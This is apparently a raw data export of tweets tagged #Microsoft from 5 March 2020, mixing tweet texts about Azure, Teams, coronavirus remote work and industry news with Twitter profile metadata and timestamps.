    <t>{'id': 101541749, 'id_str': '101541749', 'name': 'Josiane Martins', 'screen_name': 'josianemarti', 'location': 'Portsmouth, NH', 'description': 'Generate #PKI Opportunities for Enterprises and Partners, Business Development #DigitalTransformation, #Cloud ,#IoT, #Brazil is the motherland!', 'url': 'https://t.co/XwssC5ZTC2', 'entities': {'url': {'urls': [{'url': 'https://t.co/XwssC5ZTC2', 'expanded_url': 'https://www.linkedin.com/in/martinsjosiane/', 'display_url': 'linkedin.com/in/martinsjosiâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 72, 'friends_count': 176, 'listed_count': 4, 'created_at': 'Sun Jan 03 18:34:00 +0000 2010', 'favourites_count': 244, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1107,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'http://pbs.twimg.com/profile_images/973627137298087936/TEN_vLM4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/973627137298087936/TEN_vLM4_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/101541749/1520965841',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</si>
  <si>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Thu Mar 05 13:06:38 +0000 2020</t>
  </si>
  <si>
    <t>My favorite #Microsoft app on #macos is Microsoft error reporting.</t>
  </si>
  <si>
    <t>{'id': 83903787, 'id_str': '83903787', 'name': 'ð•¯eathBecomesMeÂ®ðŸ’€', 'screen_name': 'DeathBecomes_Me', 'location': 'New York, USA', 'description': 'How nice of you to join me in my loneliness. #atheism #comedy', 'url': 'https://t.co/M9FLMGy3UI', 'entities': {'url': {'urls': [{'url': 'https://t.co/M9FLMGy3UI', 'expanded_url': 'https://medium.com/deathbecomes-me', 'display_url': 'medium.com/deathbecomes-me', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 255, 'friends_count': 574, 'listed_count': 30, 'created_at': 'Tue Oct 20 19:00:16 +0000 2009', 'favourites_count': 5975, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 17781,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'http://pbs.twimg.com/profile_images/1167891212352675843/qvlIAjf8_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1167891212352675843/qvlIAjf8_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/83903787/1533843787', 'profile_link_color': '990000',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</si>
  <si>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13:05:21 +0000 2020</t>
  </si>
  <si>
    <t>#Windows 10 Always On #VPN and third-party VPN devices. #Microsoft #Windows10 #Win10 #aovpn #mobility https://t.co/GuCXZfOGqD</t>
  </si>
  <si>
    <t>Thu Mar 05 13:05:10 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft and its extensive #propaganda network is #googlebombing "Linux" this week to promote #powershell -- disregard these spamming-like efforts</t>
  </si>
  <si>
    <t>Thu Mar 05 13:04:30 +0000 2020</t>
  </si>
  <si>
    <t>#ConsenSys and #EY Announces the Formation of #Baseline Protocol in Collaboration With #Microsoft - https://t.co/eBOuIxVifJ https://t.co/ebvWvj1AzQ</t>
  </si>
  <si>
    <t>{'id': 804027210415964162, 'id_str': '804027210415964162', 'name': 'Crypto economy (EN)', 'screen_name': 'CryptoEconomyEN', 'location': '', 'description': 'Cryptocurrency News #Bitcoin #Cryptocurrencies #Altcoins #IEOs #Mining #Cryptocurrency  #Blockchain', 'url': 'https://t.co/RqvUFPQ9Sd', 'entities': {'url': {'urls': [{'url': 'https://t.co/RqvUFPQ9Sd', 'expanded_url': 'https://crypto-economy.com/', 'display_url': 'crypto-economy.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4427, 'friends_count': 335, 'listed_count': 40, 'created_at': 'Wed Nov 30 18:19:59 +0000 2016', 'favourites_count': 265, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3170, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1082572278792159232/YAmg63y3_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1082572278792159232/YAmg63y3_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/804027210415964162/1566803699',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</si>
  <si>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13:04:26 +0000 2020</t>
  </si>
  <si>
    <t>Make life easier for your teachers with these simple, time-saving #Windows10 shortcuts.      #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/lnnxR5xfm3</t>
  </si>
  <si>
    <t>{'id': 391735234, 'id_str': '391735234', 'name': 'Robert Strickland', 'screen_name': 'rstricks', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 28, 'friends_count': 68, 'listed_count': 0, 'created_at': 'Sun Oct 16 01:19:05 +0000 2011', 'favourites_count': 118, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 604,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</si>
  <si>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13:02:36 +0000 2020</t>
  </si>
  <si>
    <t>Still one of my mostly downloaded TechNet Gallery contributions; installing the Microsoft Monitoring Agent using #PowerShell (OMS ist just left in the URL)
https://t.co/Il8D3mqpSC
#AzureMonitor #Azure #Microsoft</t>
  </si>
  <si>
    <t>{'id': 501644558, 'id_str': '501644558', 'name': 'Daniel Ã–rneling', 'screen_name': 'DanielOrneling', 'location': 'Trelleborg, Sweden', 'description': 'Senior consultant focusing on Azure infrastructure at @AddPro, with a little extra love for Azure Monitor. Visit my blog at https://t.co/1mqjBgr4MV', 'url': 'https://t.co/SQPXHKH5gm', 'entities': {'url': {'urls': [{'url': 'https://t.co/SQPXHKH5gm', 'expanded_url': 'http://blog.orneling.se', 'display_url': 'blog.orneling.se', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/1mqjBgr4MV', 'expanded_url': 'http://Blog.Orneling.se', 'display_url': 'Blog.Orneling.se', 'indices': [124, 147]}]}}, 'protected': False, 'followers_count': 605, 'friends_count': 205, 'listed_count': 56, 'created_at': 'Fri Feb 24 10:21:06 +0000 2012', 'favourites_count': 1149, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3960,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'http://pbs.twimg.com/profile_images/1135833434969034752/iYs9MqIS_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1135833434969034752/iYs9MqIS_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/501644558/1431498486',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</si>
  <si>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13:01:54 +0000 2020</t>
  </si>
  <si>
    <t>Increased volumes boost Mayo Clinic to top $1B in operating income for 2019
https://t.co/5EZI2LveqG
#sdoh #socialdeterminantsofhealth #gohealthhero #pophealth #health #wellbeing #valuebased #healthit #salesforce #cerner #epic #microsoft #Z55 #Z65</t>
  </si>
  <si>
    <t>Thu Mar 05 13:01:31 +0000 2020</t>
  </si>
  <si>
    <t>NVv4-Series and NDv2-SeriesVMs are now Generally Available
- unprecedented GPU resourcing flexibility
- https://t.co/fNWAcFrxuV
- https://t.co/AKgLdFVMO4
#Azure #Microsoft #Cloud #Compute #NSeries #GPU</t>
  </si>
  <si>
    <t>Thu Mar 05 13:01:28 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/T7j5xhItJQ
Repeat Or Play All Videos 2020
https://t.co/75eu9KPNhk
https://t.co/U45RO5Je8g
https://t.co/6WgJC8gbAm
#iamintel #intel #windows10 #microsoft #android #mobile #ios #iphone #ipad #tablet #cnxplayer #app #hdr #10bit #4k #fullhd #uhd #ultrahd #casting https://t.co/ffKKylWAk4</t>
  </si>
  <si>
    <t>Thu Mar 05 13:00:49 +0000 2020</t>
  </si>
  <si>
    <t>Go into the tennis court again and smash your way through the championships in Smash Court Tennis 3 https://t.co/syHgO3RSUZ #microsoft #xbox360 #fun #gamer #tennis https://t.co/fm5QxUdSGd</t>
  </si>
  <si>
    <t>Thu Mar 05 13:00:08 +0000 2020</t>
  </si>
  <si>
    <t>Enabling remote workers is 100% dependent on maintaining your team's ability to chat, collaborate, hold meetings and call each other with ease. #MicrosoftTeams provides all of these features.  Learn more in this Adoption Guide. https://t.co/jA2NGHY6cV
#microsoft #microsoft365 https://t.co/6HDB0QRwYF</t>
  </si>
  <si>
    <t>Thu Mar 05 13:00:03 +0000 2020</t>
  </si>
  <si>
    <t>New IDC report shows big opportunities to transform higher education through AI #Microsoft #Teams #Microsoft365 #Powerplatform #Azure https://t.co/3y6XaM71S2</t>
  </si>
  <si>
    <t>Thu Mar 05 13:00:01 +0000 2020</t>
  </si>
  <si>
    <t>#mobile #form-factors #Unifying #security #policy #Wandera #Microsoft https://t.co/a5Q4vqTUEO #Blogs #TechBlogs #wrijugh</t>
  </si>
  <si>
    <t>{'id': 108163940, 'id_str': '108163940', 'name': 'Wriju Ghosh #wghosh', 'screen_name': 'wrijugh', 'location': 'Bengaluru', 'description': "à¦®à§‡à¦˜ à¦¸à¦®à¦¾à¦§à¦¾à¦¨ à¦¸à§à¦¥à¦ªà¦¤à¦¿ (CSA) @ MSFT \nMy tweets are not my employer's view. It's a personal space to share my thoughts.", 'url': 'https://t.co/bCNhmndtTr', 'entities': {'url': {'urls': [{'url': 'https://t.co/bCNhmndtTr', 'expanded_url': 'http://wriju.wordpress.com', 'display_url': 'wriju.wordpress.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 331, 'friends_count': 380, 'listed_count': 18, 'created_at': 'Mon Jan 25 02:08:32 +0000 2010', 'favourites_count': 753, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5826,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'http://pbs.twimg.com/profile_images/1111675528593854464/yI9F4EwR_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1111675528593854464/yI9F4EwR_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/108163940/1520541115',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</si>
  <si>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12:59:54 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft DevBlog: How to Write a Roslyn Analyzer https://t.co/tkleA7XlC1</t>
  </si>
  <si>
    <t>Thu Mar 05 12:59:48 +0000 2020</t>
  </si>
  <si>
    <t>Why is New Protocol by EY, ConsenSys, #Microsoft Important for #Ethereum
https://t.co/DLp3OttiBl https://t.co/L46p0kNNJR</t>
  </si>
  <si>
    <t>Thu Mar 05 12:59:17 +0000 2020</t>
  </si>
  <si>
    <t>Crisis Communications Template From the PowerPlatform Team https://t.co/rmJ7wIlaBN #microsoft #technology #healthcare  #MSFTAdvocate https://t.co/kk1Qtgwt0q</t>
  </si>
  <si>
    <t>Thu Mar 05 12:59:16 +0000 2020</t>
  </si>
  <si>
    <t>Combining Azure Lighthouse with Sentinels DevOps capabilities
- combine Azure Sentinels DevOps capabilities with the use of Azure Lighthouse to manage a multi-tenant environment
https://t.co/QCJWj688az
#Azure #Microsoft #Cloud #Security #SEIM #Sentinel #DevOps https://t.co/b5nZPWYaPt</t>
  </si>
  <si>
    <t>Thu Mar 05 12:58:43 +0000 2020</t>
  </si>
  <si>
    <t>Hundreds of Microsoft sub-domains open to hijacking https://t.co/7mj2GFvdeX #Azure #IT #Microsoft #SubDomainTakeover</t>
  </si>
  <si>
    <t>{'id': 243779818, 'id_str': '243779818', 'name': 'Ludovico Loreti', 'screen_name': 'LudovicoLoreti', 'location': '', 'description': 'Ethical Hacker.  Once a time I was N4pst3r.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 3987, 'friends_count': 233, 'listed_count': 107, 'created_at': 'Thu Jan 27 20:05:31 +0000 2011', 'favourites_count': 393, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4651, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '38383B', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/686698451359371269/Ma0uNgfv_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/686698451359371269/Ma0uNgfv_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/243779818/1386718553', 'profile_link_color': 'ABB8C2',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</si>
  <si>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Thu Mar 05 12:57:19 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft, Accenture collaborate to help entrepreneurs, startups focused on social impact
https://t.co/0aa9FLTiUK
#microsoft #startup #socialimpact #entrepreneurs #entrepreneurship #accenture #startups #hrnews #startupbootcamp #hrtrends #humancapitalonline #humancapitalmagazine https://t.co/lKVDMHGP1i</t>
  </si>
  <si>
    <t>{'id': 338314497, 'id_str': '338314497', 'name': 'Human Capital Online', 'screen_name': 'HumanCapitalOnl', 'location': 'New Delhi', 'description': "India's Leading HR Magazine | Know What's New in Human Resources | Industry Leaders, Trending Issues and More. Subscribe Now +91-562-2527775", 'url': 'https://t.co/QQPqkxfwDi', 'entities': {'url': {'urls': [{'url': 'https://t.co/QQPqkxfwDi', 'expanded_url': 'http://www.humancapitalonline.com', 'display_url': 'humancapitalonline.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2346, 'friends_count': 2630, 'listed_count': 34, 'created_at': 'Tue Jul 19 11:52:13 +0000 2011', 'favourites_count': 293, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3431,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'http://pbs.twimg.com/profile_images/865854215855382528/-iJIoTQY_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/865854215855382528/-iJIoTQY_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/338314497/1583146472', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '000000', 'profile_text_color': '000000', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 12:57:12 +0000 2020</t>
  </si>
  <si>
    <t>Empowering digital transformation with .NET, ML and Azure https://t.co/PKPgwq9jnt #Azure #Channel9 #Microsoft</t>
  </si>
  <si>
    <t>{'id': 4724126716, 'id_str': '4724126716', 'name': 'HeyAzureGuy', 'screen_name': 'heyazureguy', 'location': 'Nederland', 'description': '', 'url': 'https://t.co/Ds58dILQOk', 'entities': {'url': {'urls': [{'url': 'https://t.co/Ds58dILQOk', 'expanded_url': 'http://www.heyazureguy.com', 'display_url': 'heyazureguy.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 137, 'friends_count': 101, 'listed_count': 5, 'created_at': 'Wed Jan 06 11:11:32 +0000 2016', 'favourites_count': 72, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 746, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/993744381260726272/X10UzmMA_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/993744381260726272/X10UzmMA_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4724126716/1549370229',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</si>
  <si>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12:56:15 +0000 2020</t>
  </si>
  <si>
    <t>Want to work in #Alpharetta, GA? View our latest opening: https://t.co/w6q2xeYi1X #Microsoft</t>
  </si>
  <si>
    <t>{'id': 24475528, 'id_str': '24475528', 'name': 'TMJ-ATL IT-.NET Jobs', 'screen_name': 'tmj_atl_itdnet', 'location': 'Atlanta, GA', 'description': 'Follow this account for geo-targeted Software Dev.  - Microsoft Tools job tweets in Atlanta, GA. Need help? Tweet us at @CareerArc!', 'url': 'https://t.co/JMM0u2CgS0', 'entities': {'url': {'urls': [{'url': 'https://t.co/JMM0u2CgS0', 'expanded_url': 'http://bit.ly/2Kg0kGp', 'display_url': 'bit.ly/2Kg0kGp', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 288, 'friends_count': 190, 'listed_count': 16, 'created_at': 'Sun Mar 15 02:50:46 +0000 2009', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 212,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'http://pbs.twimg.com/profile_images/682003757312311296/8b3qzpEM_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/682003757312311296/8b3qzpEM_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/24475528/1451437343',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</si>
  <si>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Thu Mar 05 12:55:03 +0000 2020</t>
  </si>
  <si>
    <t>Crisis Communication: a #Microsoft Power Platform template https://t.co/jiBxykkvzK https://t.co/lLre3Reph4</t>
  </si>
  <si>
    <t>{'id': 15981173, 'id_str': '15981173', 'name': 'Chris Bortlik', 'screen_name': 'cbortlik', 'location': 'Woburn, MA', 'description': 'Works for Microsoft as a Principal Technical Architect at the MTC in Boston, MA. Author. Speaker. Blogger. Husband. Dad.', 'url': 'https://t.co/ZXCiJf7qzV', 'entities': {'url': {'urls': [{'url': 'https://t.co/ZXCiJf7qzV', 'expanded_url': 'https://medium.com/@cbortlik', 'display_url': 'medium.com/@cbortlik', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1988, 'friends_count': 1066, 'listed_count': 201, 'created_at': 'Mon Aug 25 13:28:48 +0000 2008', 'favourites_count': 2738, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5621,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'http://pbs.twimg.com/profile_images/906889522272600064/6_EMipz1_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/906889522272600064/6_EMipz1_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/15981173/1434464120',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</si>
  <si>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12:54:23 +0000 2020</t>
  </si>
  <si>
    <t>Avoid business disruptions and use this as an opportunity to modernize your application stack by moving to it to Microsoft cloud.
Contact us at ms@login2it.com for more details.
#LoginInfotech #Microsoft #Azure #MicrosoftAzure #Software #LIPL #Bangalore 
@Azure https://t.co/NsnXrdnMsN</t>
  </si>
  <si>
    <t>{'id': 2188132352, 'id_str': '2188132352', 'name': 'Login Infotech Pvt. Ltd.', 'screen_name': 'login2it', 'location': 'Bangalore India', 'description': 'Get connected to the IT world. LIPL has been a pioneer in providing world class IT products, services and consulting to diversified range of businesses.', 'url': 'https://t.co/1S2EZjOk4F', 'entities': {'url': {'urls': [{'url': 'https://t.co/1S2EZjOk4F', 'expanded_url': 'http://login2it.com', 'display_url': 'login2it.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 9, 'friends_count': 92, 'listed_count': 0, 'created_at': 'Mon Nov 11 10:37:35 +0000 2013', 'favourites_count': 34, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 38,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'http://pbs.twimg.com/profile_images/1185108563229691905/677O21_D_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1185108563229691905/677O21_D_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2188132352/1577447968',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</si>
  <si>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12:52:21 +0000 2020</t>
  </si>
  <si>
    <t>Empowering digital transformation with .NET, ML and Azure https://t.co/cbGljIolaX #Microsoft</t>
  </si>
  <si>
    <t>Thu Mar 05 12:48:57 +0000 2020</t>
  </si>
  <si>
    <t>#Amazon, #Microsoft and #Facebook order workers to go home because of #coronavirus https://t.co/ssGxDj3Saw</t>
  </si>
  <si>
    <t>{'id': 2190845029, 'id_str': '2190845029', 'name': 'USA Customers', 'screen_name': 'usacustomers', 'location': 'USA ', 'description': '', 'url': 'https://t.co/jKAC1b51Bg', 'entities': {'url': {'urls': [{'url': 'https://t.co/jKAC1b51Bg', 'expanded_url': 'http://UCscreen.com', 'display_url': 'UCscreen.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3737, 'friends_count': 1599, 'listed_count': 390, 'created_at': 'Tue Nov 12 18:39:10 +0000 2013', 'favourites_count': 8264, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 38247,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'http://pbs.twimg.com/profile_images/480095535722803200/S4xJAkn0_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/480095535722803200/S4xJAkn0_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2190845029/1403299775',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</si>
  <si>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Thu Mar 05 12:45:55 +0000 2020</t>
  </si>
  <si>
    <t>We love #SharePoint! Perhaps you feel differently? Check out our guide here - you can become a lover of the platform too! https://t.co/cqMouzBdWB 
#SharePointHelp #Office365 #Office365Help #Microsoft https://t.co/GEMamzKNVM</t>
  </si>
  <si>
    <t>Thu Mar 05 12:45:27 +0000 2020</t>
  </si>
  <si>
    <t>Good context and coverage on the recent announcement from #Microsoft and others regarding our corporate action on #climate change https://t.co/JUAwqWl5mM</t>
  </si>
  <si>
    <t>{'id': 22835420, 'id_str': '22835420', 'name': 'Joerg Hambueckers', 'screen_name': 'Hambueckers', 'location': 'Deutschland', 'description': 'Cloud Managed Services Provider', 'url': 'https://t.co/hewczHBTJL', 'entities': {'url': {'urls': [{'url': 'https://t.co/hewczHBTJL', 'expanded_url': 'http://www.microsoft.de/', 'display_url': 'microsoft.de', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 212, 'friends_count': 320, 'listed_count': 62, 'created_at': 'Wed Mar 04 21:14:48 +0000 2009', 'favourites_count': 94, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4961, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FAF7FA', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1149035789776560129/qqPsFZi9_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1149035789776560129/qqPsFZi9_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/22835420/1552662778', 'profile_link_color': 'ABB8C2', 'profile_sidebar_border_color': 'EEEEEE', 'profile_sidebar_fill_color': 'EFEFEF', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 12:43:26 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft, #Amazon Advise Staff to Work From Home as #Coronavirus Spreads, #Facebook Contractor Confirmed Infected https://t.co/rdCuSgRksO</t>
  </si>
  <si>
    <t>Thu Mar 05 12:43:00 +0000 2020</t>
  </si>
  <si>
    <t>KineMaster For PC [Windows 10/ Mac] - Free Download
https://t.co/PuFJqcCror
#Microsoft #kineaster #pc #download #smartphones</t>
  </si>
  <si>
    <t>{'id': 927112247054233605, 'id_str': '927112247054233605', 'name': 'ArchieCadell', 'screen_name': 'ArchieCadell', 'location': '', 'description': 'Archie Cadell is a #digital influencer known to share her expert views on #startup solutions, #OnDemand business ideas, latest #marketing trend and #social', 'url': 'https://t.co/1GtlYLPYrG', 'entities': {'url': {'urls': [{'url': 'https://t.co/1GtlYLPYrG', 'expanded_url': 'http://www.darbaar.com/', 'display_url': 'darbaar.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1250, 'friends_count': 1237, 'listed_count': 5, 'created_at': 'Sun Nov 05 09:55:59 +0000 2017', 'favourites_count': 4516, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2003,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'http://pbs.twimg.com/profile_images/1057271169366155269/bZvLOXp__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1057271169366155269/bZvLOXp__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/927112247054233605/1541066930',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</si>
  <si>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12:38:04 +0000 2020</t>
  </si>
  <si>
    <t>@afmcdnl @chriscolleydog @thinkharvey I definitely should have tagged you in that @afmcdnl!  At a future meet-up or #EdCampOttawa?  Just reading the lesson plans, I learned a lot about #Microsoft Data Streamer and COM Add-ins for @msexcel.  Looks like a great real-world CS project to introduce to our students!</t>
  </si>
  <si>
    <t>{'id': 3015843880, 'id_str': '3015843880', 'name': 'Stuart Gray', 'screen_name': 'S_T_Gray', 'location': 'Ottawa, Ontario', 'description': '#EdTech Consultant working to develop the digital competence of teachers &amp; students.  #MIE, #MIETrainer, #MIEMasterTrainer, #GoogleCE 1&amp;2', 'url': 'https://t.co/0kac2GIDnQ', 'entities': {'url': {'urls': [{'url': 'https://t.co/0kac2GIDnQ', 'expanded_url': 'https://www.linkedin.com/in/stuartgray84/', 'display_url': 'linkedin.com/in/stuartgray8â€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 217, 'friends_count': 742, 'listed_count': 4, 'created_at': 'Wed Feb 04 00:32:26 +0000 2015', 'favourites_count': 615, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 135,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'http://pbs.twimg.com/profile_images/1177065122164027392/waWXSmb8_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1177065122164027392/waWXSmb8_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3015843880/1567193718',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</si>
  <si>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12:38:00 +0000 2020</t>
  </si>
  <si>
    <t>For 28 years, this company was a point-of-sale business. Now, after two years of using Microsoft Power BI and analytics, we've become an analytics company. #Powerbi #Microsoft https://t.co/Rc3aOzZKtR</t>
  </si>
  <si>
    <t>{'id': 47083166, 'id_str': '47083166', 'name': 'Arnav', 'screen_name': 'arnavkummar', 'location': 'Pune', 'description': 'I am Arnav !!!', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 325, 'friends_count': 108, 'listed_count': 6, 'created_at': 'Sun Jun 14 12:26:56 +0000 2009', 'favourites_count': 122, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1573,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'http://pbs.twimg.com/profile_images/802070291018977280/oMns195T_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/802070291018977280/oMns195T_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/47083166/1518939943',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</si>
  <si>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12:35:55 +0000 2020</t>
  </si>
  <si>
    <t>Great response from the session on #HPE #GreenLake #HybridCloud for #Microsoft #Azure at the Lisbon HPE #Microsoft Hybrid #Cloud Summit  Many attendees unaware that such an as-a-service option existed. It does!! https://t.co/8Mq0BHIqw1 @HPE_HybridCloud @HPE_PointNext https://t.co/ffWbFiBAVn</t>
  </si>
  <si>
    <t>{'id': 1374446684, 'id_str': '1374446684', 'name': 'Urs Renggli', 'screen_name': 'Renggli_Urs', 'location': 'Zurich, Switzerland', 'description': '', 'url': 'https://t.co/KsAx2vngQi', 'entities': {'url': {'urls': [{'url': 'https://t.co/KsAx2vngQi', 'expanded_url': 'https://ch.linkedin.com/in/ursrenggli', 'display_url': 'ch.linkedin.com/in/ursrenggli', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 492, 'friends_count': 682, 'listed_count': 34, 'created_at': 'Tue Apr 23 11:30:37 +0000 2013', 'favourites_count': 4990, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5721,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'http://pbs.twimg.com/profile_images/1223380248508686336/OAE1uiFq_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1223380248508686336/OAE1uiFq_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1374446684/1576235184',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</si>
  <si>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12:33:57 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft is named the leader in building #AI solutions. #gartner #microsoft https://t.co/vx6IRbyBOL</t>
  </si>
  <si>
    <t>{'id': 326165528, 'id_str': '326165528', 'name': 'Tahir Naveed', 'screen_name': 'NooriNath', 'location': 'Gotham City', 'description': 'I do stuff with Cloud at @Microsoft. Tweets are my own.', 'url': 'https://t.co/NRPuFzxcT3', 'entities': {'url': {'urls': [{'url': 'https://t.co/NRPuFzxcT3', 'expanded_url': 'http://github.com/AlgoNinja', 'display_url': 'github.com/AlgoNinja', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 104, 'friends_count': 87, 'listed_count': 14, 'created_at': 'Wed Jun 29 13:49:38 +0000 2011', 'favourites_count': 12, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 145,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'http://pbs.twimg.com/profile_images/563055646363639808/36dwJ1E-_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/563055646363639808/36dwJ1E-_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/326165528/1455122546',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</si>
  <si>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12:32:42 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft foresees that 0.5% of enterprise accounts on #Azure and #O365 will be compromised every month because customers do not enable #MFA and still use legacy #authentication and services
#cybersecurity #securityawareness https://t.co/hczNAXkmd2</t>
  </si>
  <si>
    <t>Thu Mar 05 12:31:22 +0000 2020</t>
  </si>
  <si>
